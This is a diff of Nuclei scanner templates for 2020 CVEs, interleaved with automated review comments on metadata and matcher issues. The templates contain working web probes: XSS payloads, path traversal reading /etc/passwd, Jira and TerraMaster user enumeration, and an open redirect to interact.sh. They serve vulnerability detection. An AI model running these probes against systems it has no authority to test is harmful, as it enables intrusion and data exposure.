@@ -4,44 +4,56 @@ info: name: TerraMaster TOS < 4.2.06 - User Enumeration author: pussycat0x severity: medium + description: | + User Enumeration vulnerability in TerraMaster TOS <= 4.2.06 allows remote unauthenticated attackers to identify valid users within the system via the username parameter to wizard/initialise.php. + impact: | + An attacker can enumerate valid usernames, potentially aiding in further attacks. + remediation: | + Upgrade TerraMaster TOS to version 4.2.06 or later. reference: - https://github.com/Threekiii/Awesome-POC/blob/master/Web%E5%BA%94%E7%94%A8%E6%BC%8F%E6%B4%9E/TerraMaster%20TOS%20%E7%94%A8%E6%88%B7%E6%9E%9A%E4%B8%BE%E6%BC%8F%E6%B4%9E%20CVE-2020-28185.md - https://nvd.nist.gov/vuln/detail/CVE-2020-28185 + - https://www.ihteam.net/advisory/terramaster-tos-multiple-vulnerabilities/ + - https://www.terra-master.com/ + - https://github.com/ArrestX/--POC + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N + cvss-score: 5.3 + cve-id: CVE-2020-28185 + epss-score: 0.00465 + epss-percentile: 0.74945 + cpe: cpe:2.3:o:terra-master:tos:*:*:*:*:*:*:*:* metadata: - max-request: 1 verified: true + max-request: 2 + vendor: terra-master + product: tos fofa-query: '"TerraMaster" && header="TOS"' - tags: tamronos,enum + tags: cve2020,cve,terramaster,enum,tos,terra-master http: - raw: - | GET /tos/index.php?user/login HTTP/1.1 Host: {{Hostname}} - User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/115.0 - Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 - Accept-Language: en-US,en;q=0.5 - Accept-Encoding: gzip, deflate - - | POST /wizard/initialise.php HTTP/1.1 Host: {{Hostname}} Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest - Referer: {{BaseURL}}/tos/index.php?user/login + Referer: {{RootURL}}/tos/index.php?user/login tab=checkuser&username=admin - cookie-reuse: 
true matchers-condition: and matchers: - type: word part: body words: - - "username" - - "email" - - "status" + - '"username":' + - '"email":' + - '"status":' condition: and - type: status @@ -53,4 +65,5 @@ http: part: body_2 regex: - '"username":"(.*?)"' - - '"email":"(.*?)"' \ No newline at end of file + - '"email":"(.*?)"' +# digest: 4b0a0048304602210083f16f101ac090f5d7e921131e73a027f6009fff40f89865c434db95593638b7022100a606966b55e981d57fde6523d60dc96e82d5cdc44a754742dac2b5268a081294:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2020/cve-2020-28188.yaml b/nuclei-templates/CVE-2020/CVE-2020-28188.yaml similarity index 100% rename from nuclei-templates/CVE-2020/cve-2020-28188.yaml rename to nuclei-templates/CVE-2020/CVE-2020-28188.yaml diff --git a/nuclei-templates/CVE-2020/cve-2020-28208.yaml b/nuclei-templates/CVE-2020/CVE-2020-28208.yaml similarity index 100% rename from nuclei-templates/CVE-2020/cve-2020-28208.yaml rename to nuclei-templates/CVE-2020/CVE-2020-28208.yaml diff --git a/nuclei-templates/CVE-2020/CVE-2020-28351.yaml b/nuclei-templates/CVE-2020/CVE-2020-28351.yaml deleted file mode 100644 index b86c4fe505..0000000000 --- a/nuclei-templates/CVE-2020/CVE-2020-28351.yaml +++ /dev/null 
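Review bot: The added `description` says TerraMaster TOS `<= 4.2.06` is affected, the `name` line says `< 4.2.06`, and the new `remediation` tells users to upgrade "to version 4.2.06 or later", so the three statements disagree on whether 4.2.06 itself is vulnerable. Take one boundary from the vendor/ihteam advisory and use it in all three places; if 4.2.06 is affected, the remediation should read `Upgrade TerraMaster TOS to a version newer than 4.2.06.`. Dropping `cookie-reuse: true` while keeping the initial `GET /tos/index.php?user/login` request leaves the purpose of that first request undocumented, since nothing else in the hunk reads its response; a one-line comment such as `# first request establishes the session cookie reused by the POST below` would make the two-request design (and `max-request: 2`) self-explanatory. The `@@ -4,44 +4,56 @@` hunk begins at file line 4, so the `id`/`info` header lines are outside this view.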
@@ -1,31 +0,0 @@ -id: CVE-2020-28351 -info: - name: ShoreTel 19.46.1802.0 XSS - author: pikpikcu - severity: medium - description: conferencing component on Mitel ShoreTel 19.46.1802.0 devices could allow an unauthenticated attacker to conduct a reflected cross-site scripting (XSS) attack (via the PATH_INFO to index.php) due to insufficient validation for the time_zone object in the HOME_MEETING& page - reference: - - https://packetstormsecurity.com/files/159987/ShoreTel-Conferencing-19.46.1802.0-Cross-Site-Scripting.html - - https://nvd.nist.gov/vuln/detail/CVE-2020-28351 - tags: cve,cve2020,shoretel,xss - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.10 - cve-id: CVE-2020-28351 - cwe-id: CWE-79 -requests: - - method: GET - path: - - "{{BaseURL}}/index.php/%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E?page=HOME" - headers: - Content-Type: application/x-www-form-urlencoded - matchers-condition: and - matchers: - - type: word - words: - - '' - part: body - - type: word - words: - - 'Content-Type: text/html' - part: header diff --git a/nuclei-templates/CVE-2020/CVE-2020-28871.yaml b/nuclei-templates/CVE-2020/CVE-2020-28871.yaml index abb78584a7..8520809f13 100644 --- a/nuclei-templates/CVE-2020/CVE-2020-28871.yaml +++ b/nuclei-templates/CVE-2020/CVE-2020-28871.yaml 
@@ -1,19 +1,21 @@ id: CVE-2020-28871 + info: name: Monitorr 1.7.6m - Unauthenticated Remote Code Execution author: gy741 severity: critical - description: Monitorr 1.7.6m is susceptible to a remote code execution vulnerability. Improper input validation and lack of authorization leads to arbitrary file uploads in the web application. An unauthorized attacker with web access to could upload and execute a specially crafted file, leading to remote code execution within the Monitorr. + description: This template detects a remote code execution (RCE) vulnerability in Monitorr 1.7.6m. Improper input validation and lack of authorization leads to arbitrary file uploads in the web application. An unauthorized attacker with web access to could upload and execute a specially crafted file, leading to remote code execution within the Monitorr. reference: - - https://www.exploit-db.com/exploits/48980 - - https://lyhinslab.org/index.php/2020/09/12/how-the-white-box-hacking-works-authorization-bypass-and-remote-code-execution-in-monitorr-1-7-6/ - https://nvd.nist.gov/vuln/detail/CVE-2020-28871 + - https://lyhinslab.org/index.php/2020/09/12/how-the-white-box-hacking-works-authorization-bypass-and-remote-code-execution-in-monitorr-1-7-6/ + - https://www.exploit-db.com/exploits/48980 + tags: cve,cve2020,monitorr,rce,oast classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 9.8 + cvss-score: 9.80 cve-id: CVE-2020-28871 cwe-id: CWE-434 - tags: cve,cve2020,monitorr,rce,oast,unauth + requests: - raw: - | @@ -35,13 +37,13 @@ requests: GIF89a213213123WMT Server playout" \ No newline at end of file diff --git a/nuclei-templates/CVE-2020/cve-2020-35476.yaml b/nuclei-templates/CVE-2020/CVE-2020-35476.yaml similarity index 100% rename from nuclei-templates/CVE-2020/cve-2020-35476.yaml rename to nuclei-templates/CVE-2020/CVE-2020-35476.yaml 
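Review bot: The rewritten `description` in the first hunk now opens with "This template detects a remote code execution (RCE) vulnerability in Monitorr 1.7.6m", describing the template rather than the vulnerability, and the `unauth` tag is dropped even though the text still states the upload is reachable by an unauthorized attacker. Keeping the previous vulnerability-first wording, `description: Monitorr 1.7.6m is susceptible to a remote code execution vulnerability. ...`, and `tags: cve,cve2020,monitorr,rce,oast,unauth` preserves searchability for the unauthenticated case. `cvss-score: 9.80` reformats `9.8` to two decimals while the other templates in this patch use one, so the field becomes inconsistent. The second hunk (`@@ -35,13 +37,13 @@`) appears truncated in this view and is not reviewed here.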
diff --git a/nuclei-templates/CVE-2020/cve-2020-35580.yaml b/nuclei-templates/CVE-2020/CVE-2020-35580.yaml
similarity index 100%
rename from nuclei-templates/CVE-2020/cve-2020-35580.yaml
rename to nuclei-templates/CVE-2020/CVE-2020-35580.yaml
diff --git a/nuclei-templates/CVE-2020/cve-2020-35598.yaml b/nuclei-templates/CVE-2020/CVE-2020-35598.yaml
similarity index 100%
rename from nuclei-templates/CVE-2020/cve-2020-35598.yaml
rename to nuclei-templates/CVE-2020/CVE-2020-35598.yaml
diff --git a/nuclei-templates/CVE-2020/CVE-2020-35749.yaml b/nuclei-templates/CVE-2020/CVE-2020-35749.yaml
deleted file mode 100644
index 4fc5969b40..0000000000
--- a/nuclei-templates/CVE-2020/CVE-2020-35749.yaml
+++ /dev/null
@@ -1,37 +0,0 @@ -id: CVE-2020-35749 -info: - name: Simple Job Board < 2.9.4 - Authenticated Path Traversal Leading to Arbitrary File Download - author: cckuailong - severity: high - description: The plugin does not validate the sjb_file parameter when viewing a resume, allowing authenticated user with the download_resume capability (such as HR users) to download arbitrary files from the web-server via a path traversal attack. - reference: - - https://wpscan.com/vulnerability/eed3bd69-2faf-4bc9-915c-c36211ef9e2d - - https://nvd.nist.gov/vuln/detail/CVE-2020-35749 - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N - cvss-score: 7.7 - cve-id: CVE-2020-35749 - cwe-id: CWE-22 - tags: cve,cve2020,lfi,wp,wordpress,wp-plugin,authenticated -requests: - - raw: - - | - POST /wp-login.php HTTP/1.1 - Host: {{Hostname}} - Origin: {{RootURL}} - Content-Type: application/x-www-form-urlencoded - Cookie: wordpress_test_cookie=WP%20Cookie%20check - - log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1 - - | - GET /wp-admin/post.php?post=372&action=edit&sjb_file=../../../../etc/passwd HTTP/1.1 - Host: {{Hostname}} - cookie-reuse: true - matchers-condition: and - matchers: - - type: regex - regex: - - "root:[x*]:0:0" - - type: status - status: - - 200 diff --git a/nuclei-templates/CVE-2020/cve-2020-35848.yaml b/nuclei-templates/CVE-2020/CVE-2020-35848.yaml similarity index 100% rename from nuclei-templates/CVE-2020/cve-2020-35848.yaml rename to nuclei-templates/CVE-2020/CVE-2020-35848.yaml diff --git a/nuclei-templates/CVE-2020/CVE-2020-35984.yaml b/nuclei-templates/CVE-2020/CVE-2020-35984.yaml index b804932903..8136dd8f95 100644 --- a/nuclei-templates/CVE-2020/CVE-2020-35984.yaml +++ b/nuclei-templates/CVE-2020/CVE-2020-35984.yaml 
@@ -6,6 +6,8 @@ info: severity: medium description: | A stored cross site scripting (XSS) vulnerability in the 'Users Alerts' feature of Rukovoditel 2.7.2 allows authenticated attackers to execute arbitrary web scripts or HTML via a crafted payload entered into the 'Title' parameter. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute malicious scripts in the victim's browser, leading to potential data theft, session hijacking, or defacement of the application. remediation: | Upgrade Rukovoditel to a version higher than 2.7.2 to mitigate the XSS vulnerability. reference: @@ -18,7 +20,7 @@ info: cve-id: CVE-2020-35984 cwe-id: CWE-79 epss-score: 0.00127 - epss-percentile: 0.47141 + epss-percentile: 0.46456 cpe: cpe:2.3:a:rukovoditel:rukovoditel:2.7.2:*:*:*:*:*:*:* metadata: verified: "true" @@ -62,4 +64,4 @@ http: regex: - 'id="form_session_token" value="(.*)" type="hidden"' internal: true -# digest: 490a00463044022050997d93bb77b3243f67b4ad3af9e747b98f8bf9d67f719a0796c7888638bba102203a23bb391a25437231c7a000ec59b106380fd5586bf496ae39c47a440cafd818:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100c093406f2e20ab363ad2e5b2e58e612c32e582979f5b76239ee293f40c516cf3022100bc62dd62624a4844c2599ec0db7386bdb99d72bf47b9f60294a335e73d51f719:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2020/CVE-2020-35985.yaml b/nuclei-templates/CVE-2020/CVE-2020-35985.yaml index 8fa6b4e147..fe42828880 100644 --- a/nuclei-templates/CVE-2020/CVE-2020-35985.yaml +++ b/nuclei-templates/CVE-2020/CVE-2020-35985.yaml 
@@ -6,6 +6,8 @@ info: severity: medium description: | A stored cross site scripting (XSS) vulnerability in the 'Global Lists" feature of Rukovoditel 2.7.2 allows authenticated attackers to execute arbitrary web scripts or HTML via a crafted payload entered into the 'Name' parameter. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute malicious scripts in the victim's browser, leading to potential data theft, session hijacking, or defacement of the application. remediation: | Upgrade Rukovoditel to a version higher than 2.7.2 to mitigate the XSS vulnerability. reference: @@ -18,14 +20,14 @@ info: cve-id: CVE-2020-35985 cwe-id: CWE-79 epss-score: 0.00127 - epss-percentile: 0.47141 + epss-percentile: 0.46456 cpe: cpe:2.3:a:rukovoditel:rukovoditel:2.7.2:*:*:*:*:*:*:* metadata: verified: true max-request: 3 vendor: rukovoditel product: rukovoditel - tags: cve,cve2020,rukovoditel,stored-xss,xss,authenticated + tags: cve2020,cve,rukovoditel,stored-xss,xss,authenticated http: - raw: @@ -62,4 +64,4 @@ http: regex: - 'id="form_session_token" value="(.*)" type="hidden"' internal: true -# digest: 4a0a00473045022044d68b15d5a554c4d81e6b69ed92e6e2f797481c6ffaa255145adca158da9e77022100ade90b2a08a449dd61f18c58f8ef377c66327d18b89fba89b35ccdd1ae40d7ea:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502201a053b9e5d1b3b39b3a63962bbb73e3bd1ae057df9bb6bbd8c70a1c54e5c889a022100dbfd8d43414776fb81d37e2acca5ce6f22a4a9ae227720b8a0c06c123a48656b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2020/CVE-2020-35986.yaml b/nuclei-templates/CVE-2020/CVE-2020-35986.yaml index d03b6dc8dc..360492a082 100644 --- a/nuclei-templates/CVE-2020/CVE-2020-35986.yaml +++ b/nuclei-templates/CVE-2020/CVE-2020-35986.yaml 
@@ -6,6 +6,8 @@ info: severity: medium description: | A stored cross site scripting (XSS) vulnerability in the 'Users Access Groups' feature of Rukovoditel 2.7.2 allows authenticated attackers to execute arbitrary web scripts or HTML via a crafted payload entered into the 'Name' parameter. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute malicious scripts in the victim's browser, leading to potential data theft, session hijacking, or defacement of the application. remediation: | Upgrade Rukovoditel to a version higher than 2.7.2 to mitigate the XSS vulnerability. reference: @@ -18,7 +20,7 @@ info: cve-id: CVE-2020-35986 cwe-id: CWE-79 epss-score: 0.00127 - epss-percentile: 0.47141 + epss-percentile: 0.46456 cpe: cpe:2.3:a:rukovoditel:rukovoditel:2.7.2:*:*:*:*:*:*:* metadata: verified: "true" @@ -62,4 +64,4 @@ http: regex: - 'id="form_session_token" value="(.*)" type="hidden"' internal: true -# digest: 4a0a00473045022100967d9f3da38134360006f945562d7bc97ab07f5d532f93e15bb693d55dfd6cca02201fe6bd2afbab81b0ec8661d855c2df61175bd34ea1f7124298680e821f1524bb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022001a1db1ce282848e286180a36258ba7a97e9ebcfd5e3bf04752665acd1be726002201be28513e9cf09e79f866ea38c6862b1004f5f20e60512c3903a76150fee9ca2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2020/CVE-2020-35987.yaml b/nuclei-templates/CVE-2020/CVE-2020-35987.yaml index 26a2c14fe2..eb8c02320d 100644 --- a/nuclei-templates/CVE-2020/CVE-2020-35987.yaml +++ b/nuclei-templates/CVE-2020/CVE-2020-35987.yaml 
@@ -6,6 +6,8 @@ info: severity: medium description: | A stored cross site scripting (XSS) vulnerability in the 'Entities List' feature of Rukovoditel 2.7.2 allows authenticated attackers to execute arbitrary web scripts or HTML via a crafted payload entered into the 'Name' parameter. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to potential data theft, session hijacking, or defacement of the affected application. remediation: | Upgrade Rukovoditel to a version higher than 2.7.2 or apply the vendor-provided patch to mitigate the XSS vulnerability. reference: @@ -18,7 +20,7 @@ info: cve-id: CVE-2020-35987 cwe-id: CWE-79 epss-score: 0.00127 - epss-percentile: 0.47141 + epss-percentile: 0.47225 cpe: cpe:2.3:a:rukovoditel:rukovoditel:2.7.2:*:*:*:*:*:*:* metadata: verified: true @@ -62,4 +64,4 @@ http: regex: - 'id="form_session_token" value="(.*)" type="hidden"' internal: true -# digest: 4b0a00483046022100a9def70b21e32211fc1e43785f8089b5e7914015e6b96d2e8f9fffe745a348e9022100de8f92c465f76b8b0ead9f9a40706ca48996586c994bf042aa00b14629b7656c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a004630440220008f7be9d19095521ee732eedcd00db1cb6c0d5ce2bfc3285e09975ecfb877fd022006d98c7cde4454aff8c6e3c19f73f57edf1f276ad7caf1c2808c837efdfcf07e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2020/CVE-2020-36287.yaml b/nuclei-templates/CVE-2020/CVE-2020-36287.yaml new file mode 100644 index 0000000000..8e5e71f48c --- /dev/null +++ b/nuclei-templates/CVE-2020/CVE-2020-36287.yaml 
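Review bot: `epss-percentile` for CVE-2020-35987 is updated to `0.47225` while the three preceding file sections (CVE-2020-35984, CVE-2020-35985, CVE-2020-35986) are updated to `0.46456`, yet all four keep the identical `epss-score: 0.00127`. A percentile is derived from the score at a given EPSS snapshot, so four equal scores refreshed at the same time should yield the same percentile; this looks like the 35987 template was regenerated from a different snapshot. Re-run the refresh so the four templates agree, e.g. `epss-percentile: 0.46456` here, or record the snapshot date in the commit if the difference is intentional.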
@@ -0,0 +1,31 @@ +id: CVE-2020-36287 +info: + name: Jira Dashboard Gadgets / Information Disclosure + author: Jafar_Abo_Nada + severity: medium + description: The dashboard gadgets preference resource of the Atlassian gadgets plugin used in Jira Server and Jira Data Center before version 8.13.5, and from version 8.14.0 before version 8.15.1 allows remote anonymous attackers to obtain gadget related settings via a missing permissions check. + tags: cve,cve2020,jira,atlassian,disclosure + reference: | + - https://twitter.com/Jafar_Abo_Nada/status/1386058611084890116 + - https://nvd.nist.gov/vuln/detail/CVE-2020-36287 + # On a vulnerable instance, iterate through gadget ID from 10000 to 19999 to get exposed information /rest/dashboards/1.0/10000/gadget/{{id}}/prefs +requests: + - raw: + - | + GET /rest/dashboards/1.0/10000/gadget/10000/prefs HTTP/1.1 + Host: {{Hostname}} + Accept-Encoding: gzip, deflate + Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 + - | + GET /rest/dashboards/1.0/10000/gadget/10001/prefs HTTP/1.1 + Host: {{Hostname}} + Accept-Encoding: gzip, deflate + Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 + req-condition: true + matchers: + - type: dsl + dsl: + - "status_code_1 == 200" + - "contains(body_1, '')" + - "status_code_2 != 401" + condition: and diff --git a/nuclei-templates/CVE-2020/CVE-2020-36289.yaml b/nuclei-templates/CVE-2020/CVE-2020-36289.yaml index 3e70a40fb5..7b2c0afd15 100644 --- a/nuclei-templates/CVE-2020/CVE-2020-36289.yaml +++ b/nuclei-templates/CVE-2020/CVE-2020-36289.yaml 
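Review bot: `reference: |` turns the reference section into one literal string instead of the list every other template in this patch uses, and because YAML does not treat `#` as a comment inside a block scalar, the indented `# On a vulnerable instance, ...` line is absorbed into that string as well. Changing it to `reference:` followed by the two `- https://...` items, and moving the note out of the scalar (as a column-0 comment above `requests:`, or into `description`), restores the structure the engine expects. In the DSL matcher, `contains(body_1, '')` is always true since every string contains the empty string, so the match effectively reduces to `status_code_1 == 200 && status_code_2 != 401`; the clause should name the response content that indicates exposed gadget preferences, or be removed so the weaker check is at least explicit. The template also lacks the `classification` block (cvss metrics, cwe-id) that the rest of the repository carries.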
@@ -1,32 +1,36 @@ id: CVE-2020-36289 + info: name: Atlassian Jira Unauth User Enumeration author: dhiyaneshDk severity: medium description: Affected versions of Atlassian Jira Server and Data Center allow an unauthenticated user to enumerate users via an Information Disclosure vulnerability in the QueryComponentRendererValue!Default.jspa endpoint. The affected versions are before version 8.5.13, from version 8.6.0 before 8.13.5, and from version 8.14.0 before 8.15.1. + tags: cve,cve2020,jira,atlassian,unauth reference: - https://twitter.com/ptswarm/status/1402644004781633540 - https://nvd.nist.gov/vuln/detail/CVE-2020-36289 - - https://jira.atlassian.com/browse/JRASERVER-71559 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N - cvss-score: 5.3 + cvss-score: 5.30 cve-id: CVE-2020-36289 cwe-id: CWE-200 - tags: cve,cve2020,jira,atlassian,unauth + requests: - method: GET path: - '{{BaseURL}}/secure/QueryComponentRendererValue!Default.jspa?assignee=user:admin' - '{{BaseURL}}/jira/secure/QueryComponentRendererValue!Default.jspa?assignee=user:admin' + matchers-condition: and matchers: - type: status status: - 200 + - type: word words: - 'rel=\"admin\"' + - type: word words: - 'application/json' diff --git a/nuclei-templates/CVE-2020/CVE-2020-36365.yaml b/nuclei-templates/CVE-2020/CVE-2020-36365.yaml new file mode 100644 index 0000000000..c3116b81e6 --- /dev/null +++ b/nuclei-templates/CVE-2020/CVE-2020-36365.yaml 
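Review bot: The hunk removes `- https://jira.atlassian.com/browse/JRASERVER-71559`, which is the vendor's own tracker entry and the most authoritative source for the affected and fixed versions quoted in `description`; the remaining Twitter and NVD links are weaker, so the vendor reference should be kept. `cvss-score: 5.30` also reformats `5.3` to two decimals, unlike the other templates in this patch, and moving `tags` above `reference` breaks the `info` key order used elsewhere in the repository.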
@@ -0,0 +1,43 @@ +id: CVE-2020-36365 + +info: + name: Smartstore <4.1.0 - Open Redirect + author: 0x_Akoko + severity: medium + description: Smartstore (aka "SmartStoreNET") before 4.1.0 contains an open redirect vulnerability via CommonController.ClearCache, ClearDatabaseCache, RestartApplication, and ScheduleTaskController.Edit. An attacker can redirect a user to a malicious site and possibly obtain sensitive information, modify data, and/or execute unauthorized operations. + impact: | + An attacker can exploit this vulnerability to redirect users to malicious websites, leading to phishing attacks or the theft of sensitive information. + remediation: | + Upgrade Smartstore to version 4.1.0 or later to fix the open redirect vulnerability. + reference: + - https://github.com/smartstore/SmartStoreNET/issues/2113 + - https://github.com/smartstore/SmartStoreNET + - https://nvd.nist.gov/vuln/detail/CVE-2020-36365 + - https://github.com/ARPSyndicate/cvemon + - https://github.com/ARPSyndicate/kenzer-templates + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2020-36365 + cwe-id: CWE-601 + epss-score: 0.00244 + epss-percentile: 0.62379 + cpe: cpe:2.3:a:smartstore:smartstorenet:*:*:*:*:*:*:*:* + metadata: + max-request: 1 + vendor: smartstore + product: smartstorenet + shodan-query: http.html:'content="Smartstore' + tags: cve2020,cve,redirect,smartstore + +http: + - method: GET + path: + - '{{BaseURL}}/backend/admin/common/clearcache?previousUrl=http://www.interact.sh' + + matchers: + - type: regex + part: header + regex: + - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/L403F0/1 +# digest: 4b0a004830460221009a56af69b3c21b9fa51cb0f1ce2fc157d3bdc58bb721e709177dc38621b0de1c022100d1822d3b7e4d326ee387d0080c3efa1014d7db6936cdb908a687e0412facc9a1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file 
diff --git a/nuclei-templates/CVE-2020/CVE-2020-36510.yaml b/nuclei-templates/CVE-2020/CVE-2020-36510.yaml
index bc0f0e5ae6..adbb20d99d 100644
--- a/nuclei-templates/CVE-2020/CVE-2020-36510.yaml
+++ b/nuclei-templates/CVE-2020/CVE-2020-36510.yaml
@@ -1,66 +1,35 @@ id: CVE-2020-36510 - info: - name: WordPress 15Zine <3.3.0 - Cross-Site Scripting + name: 15Zine < 3.3.0 - Reflected Cross-Site Scripting author: veshraj severity: medium description: | - WordPress 15Zine before 3.3.0 is vulnerable to reflected cross-site scripting because the theme does not sanitize the cbi parameter before including it in the HTTP response via the cb_s_a AJAX action. - impact: | - Successful exploitation of this vulnerability could allow an attacker to execute malicious scripts in the context of a victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information. - remediation: | - Update WordPress 15Zine to version 3.3.0 or later to mitigate the vulnerability. + The 15Zine Wordpress theme does not sanitize the cbi parameter before including it in the HTTP response via the cb_s_a AJAX action, leading to a reflected cross-site scripting. reference: - https://wpscan.com/vulnerability/d1dbc6d7-7488-40c2-bc38-0674ea5b3c95 - - https://nvd.nist.gov/vuln/detail/CVE-2020-36510 - - https://github.com/ARPSyndicate/kenzer-templates + - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-36510 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.1 + cvss-score: 6.10 cve-id: CVE-2020-36510 cwe-id: CWE-79 - epss-score: 0.00106 - epss-percentile: 0.42122 - cpe: cpe:2.3:a:codetipi:15zine:*:*:*:*:*:wordpress:*:* metadata: - verified: "false" - max-request: 1 - vendor: codetipi - product: 15zine - framework: wordpress - tags: cve2020,cve,xss,wordpress,wp-theme,wp,wpscan,codetipi - -flow: http(1) && http(2) - -http: - - raw: - - | - GET /wp-content/themes/15zine/readme.txt HTTP/1.1 - Host: {{Hostname}} - - matchers: - - type: word - internal: true - words: - - '/wp-content/themes/15zine/assets/' - + verified: false + tags: xss,wordpress,wp-theme,wp,cve,cve2020 +requests: - method: GET path: - 
'{{BaseURL}}/wp-admin/admin-ajax.php?action=cb_s_a&cbi=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E' - matchers-condition: and matchers: - type: word part: body words: - "" - - type: word part: header words: - text/html - - type: status status: - 200 -# digest: 4a0a00473045022100c1ef38f0b31cc4796a572017f5aa569d3ca8d69d5db61193a22056a2fa4b791102205dd37e9b2682478a3d9d1e057acfd977eae5d1ccfd95e114c39457cc26e9b90e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2020/CVE-2020-3952.yaml b/nuclei-templates/CVE-2020/CVE-2020-3952.yaml index a0acc3d2bc..7cc364d05c 100644 --- a/nuclei-templates/CVE-2020/CVE-2020-3952.yaml +++ b/nuclei-templates/CVE-2020/CVE-2020-3952.yaml @@ -1,4 +1,5 @@ id: CVE-2020-3952 + info: name: vCenter Server LFI author: medbsq @@ -11,6 +12,8 @@ requests: - "{{BaseURL}}//eam/vib?id=/etc/passwd" headers: User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55 + + matchers-condition: or matchers: - type: word @@ -18,7 +21,7 @@ requests: - "driver" - "dbtype" part: body - condition: and + condition: and - type: word words: - "bin/bash" diff --git a/nuclei-templates/CVE-2020/CVE-2020-5191.yaml b/nuclei-templates/CVE-2020/CVE-2020-5191.yaml index c14db103a8..07db650b42 100644 --- a/nuclei-templates/CVE-2020/CVE-2020-5191.yaml +++ b/nuclei-templates/CVE-2020/CVE-2020-5191.yaml 
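Review bot: The new side of the `@@ -1,66 +1,35 @@` hunk replaces the two-step template with a single-request one, dropping the `flow: http(1) && http(2)` gate that only fires the XSS probe after the `readme.txt` fingerprint matches, along with `cpe`, `epss-*`, `max-request`, `vendor`/`product`/`framework`, the NVD reference and the `http:` section name, which is reverted to the deprecated `requests:` that the other hunks in this patch migrate away from. Without the fingerprint step the probe is sent to every target and a positive result is no longer tied to the 15Zine theme, so this reads as an accidental regression to an older revision rather than an update; the previous revision should be restored. `verified: false` also flips the earlier `"false"` string to a boolean and `cvss-score: 6.10` reformats `6.1`, both inconsistent with the neighbouring templates. The hunk begins at file line 1 and ends at the digest line, so the whole template is in view.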
@@ -6,6 +6,10 @@ info: severity: medium description: | PHPGurukul Hospital Management System in PHP 4.0 contains multiple cross-site scripting vulnerabilities. An attacker can execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. + impact: | + Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement of the affected website. + remediation: | + Upgrade to the latest version to mitigate this vulnerability. reference: - https://www.exploit-db.com/exploits/47841 - https://phpgurukul.com/hospital-management-system-in-php/ @@ -15,11 +19,17 @@ info: cvss-score: 6.1 cve-id: CVE-2020-5191 cwe-id: CWE-79 + epss-score: 0.00345 + epss-percentile: 0.68617 + cpe: cpe:2.3:a:phpgurukul:hospital_management_system:4.0:*:*:*:*:*:*:* metadata: - verified: "true" - tags: cve2020,hms,cms,xss,authenticated,edb,cve + verified: true + max-request: 2 + vendor: phpgurukul + product: hospital_management_system + tags: cve2020,cve,hms,cms,xss,authenticated,edb,phpgurukul -requests: +http: - raw: - | POST /hospital/hms/admin/index.php HTTP/1.1 @@ -27,7 +37,6 @@ requests: Content-Type: application/x-www-form-urlencoded username={{username}}&password={{password}}&submit=&submit= - - | POST /hospital/hms/admin/doctor-specilization.php HTTP/1.1 Host: {{Hostname}} @@ -37,7 +46,7 @@ requests: host-redirects: true max-redirects: 2 - cookie-reuse: true + matchers-condition: and matchers: - type: word @@ -53,5 +62,4 @@ requests: - type: status status: - 200 - -# Enhanced by mp on 2022/09/02 +# digest: 4a0a004730450220124a1449183f188b35b4f719c2326afa6646b898b1e01eba50c58b774045f986022100e740bb911aae6f4d5a6af96139596c6f0e7b0ae853d6d324a26b44037b0863c1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file 
